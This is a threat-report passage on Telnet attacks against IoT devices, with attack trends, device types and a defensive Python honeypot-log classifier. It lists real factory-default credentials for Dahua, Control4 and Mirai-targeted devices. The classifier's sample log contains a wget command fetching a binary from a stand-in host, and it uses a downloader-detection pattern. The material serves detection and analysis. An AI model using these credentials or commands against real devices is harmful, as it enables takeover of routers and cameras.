2019 Cybersecurity Insights -16


In this section, we analyzed threats against three major protocols.

Threats Against Telnet

According to data from NSFOCUS's threat hunting system, Telnet (port 23) was the IoT protocol most favored by attackers, being targeted by a total of 120,000 attack sources. Figure 7-3 shows the activity trend of Telnet attack sources from March to October 2019. The number of Telnet attack sources rose month by month from March to August; August saw the most attack sources (over 60,000), which carried out more than 50,000 weak password detection activities. June saw the most sample download activities (more than 40,000). After the August peak, the number of attack sources declined through the latter half of 2019.


We also analyzed the attack sources by geography. Figure 7-4 shows the top 10 countries by number of attack sources, with China and the USA in the top two spots.


By correlating the attack sources with asset intelligence data from NTI, we found that IoT devices accounted for 29% of attack sources. Among those IoT devices, routers (47%) and video surveillance devices (42%) dominated; see Figure 7-5. These two kinds of devices are arguably the most easily exploited IoT devices.


Weak password cracking is the main means attackers use against Telnet. Our analysis of weak password exploitation found that many IoT devices were compromised after weak password cracking. Table 7.3 lists the top 10 weak passwords (username-password pairs) used for cracking. Of those, root-vizxv gives a direct login to the management backend of Dahua security surveillance devices; root-t0talc0ntr0l4! is the default access credential of Control4 smart home devices; and root-taZz@23495859 is one of the weak passwords most frequently used by Asher, a Mirai variant, to infect routers. Because these are factory defaults baked into firmware, a single successful login with one of them identifies the device family to the attacker as well as granting access.
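As an added example (not NSFOCUS's code or data), the script below classifies Telnet honeypot events into the two activity types the figures above count, weak password probing and sample download, and flags attempts that use the three default credentials named in the text. The log format, the source addresses and commands, the downloader-command heuristic and the probing threshold are constructed assumptions for the example; only the three credential pairs and their device associations come from the report.

```python
"""Classify Telnet honeypot activity per source IP.

Added example, not NSFOCUS code. Log lines are constructed; the log format,
the downloader heuristic and PROBE_THRESHOLD are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# The three username/password pairs named in the report and what each unlocks.
KNOWN_DEFAULTS = {
    ("root", "vizxv"): "Dahua surveillance device backend",
    ("root", "t0talc0ntr0l4!"): "Control4 smart home default",
    ("root", "taZz@23495859"): "used by the Asher Mirai variant against routers",
}

# Assumed heuristic: a post-login command that fetches a file is treated as a
# sample (malware) download, the second activity type the report counts.
DOWNLOADER_RE = re.compile(r"\b(wget|tftp|curl|ftpget)\b")

# Assumed threshold: this many distinct credential pairs from one source counts
# as weak password probing even when none of them is on the known list.
PROBE_THRESHOLD = 3

# Assumed honeypot line format: "<ts> <src_ip> login user=.. pass=.. result=ok|fail"
# or "<ts> <src_ip> cmd line=<command>". Passwords containing spaces are not handled.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<event>login|cmd)\s+(?P<rest>.*)$"
)
LOGIN_RE = re.compile(r"user=(?P<user>\S+)\s+pass=(?P<pw>\S+)\s+result=(?P<result>ok|fail)")

# Constructed sample events (documentation-range addresses).
SAMPLE_LOG = """\
2019-08-03T10:00:01Z 198.51.100.7 login user=root pass=vizxv result=fail
2019-08-03T10:00:02Z 198.51.100.7 login user=root pass=t0talc0ntr0l4! result=fail
2019-08-03T10:00:03Z 198.51.100.7 login user=root pass=taZz@23495859 result=ok
2019-08-03T10:00:04Z 198.51.100.7 cmd line=/bin/busybox wget http://203.0.113.9/bins/arm7 -O /tmp/.x
2019-08-03T10:05:00Z 203.0.113.55 login user=admin pass=admin result=fail
2019-08-03T10:05:01Z 203.0.113.55 login user=root pass=vizxv result=fail
2019-08-03T10:09:00Z 192.0.2.10 login user=operator pass=S3cretLongPass result=ok
2019-08-03T10:09:30Z 192.0.2.10 cmd line=show version
"""


@dataclass
class SourceSummary:
    login_attempts: int = 0
    successes: int = 0
    distinct_pairs: set = field(default_factory=set)
    default_hits: list = field(default_factory=list)   # (user, password, label)
    download_cmds: list = field(default_factory=list)


def analyze(log_text):
    """Aggregate honeypot events per source IP; malformed lines are skipped."""
    sources = defaultdict(SourceSummary)
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw.strip())
        if m is None:
            continue
        summary = sources[m["src"]]
        if m["event"] == "login":
            lm = LOGIN_RE.search(m["rest"])
            if lm is None:
                continue
            pair = (lm["user"], lm["pw"])
            summary.login_attempts += 1
            summary.distinct_pairs.add(pair)
            if lm["result"] == "ok":
                summary.successes += 1
            label = KNOWN_DEFAULTS.get(pair)
            if label:
                summary.default_hits.append((pair[0], pair[1], label))
        else:
            cmdline = m["rest"].partition("line=")[2]
            if DOWNLOADER_RE.search(cmdline):
                summary.download_cmds.append(cmdline)
    return dict(sources)


def classify(summary):
    """Return the set of activity labels observed for one source."""
    labels = set()
    if summary.default_hits or len(summary.distinct_pairs) >= PROBE_THRESHOLD:
        labels.add("weak_password_probing")
    if summary.download_cmds:
        labels.add("sample_download")
    return labels


if __name__ == "__main__":
    for src, summary in analyze(SAMPLE_LOG).items():
        print(src, sorted(classify(summary)), summary.default_hits)
```

The first source tries all three report-listed defaults, logs in with the Asher credential and immediately fetches a binary, so it is labelled with both activity types; the second is flagged on a single known-default attempt; the third, an operator using a non-default password and issuing an ordinary command, is left unlabelled.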


To be continued.

NSFOCUS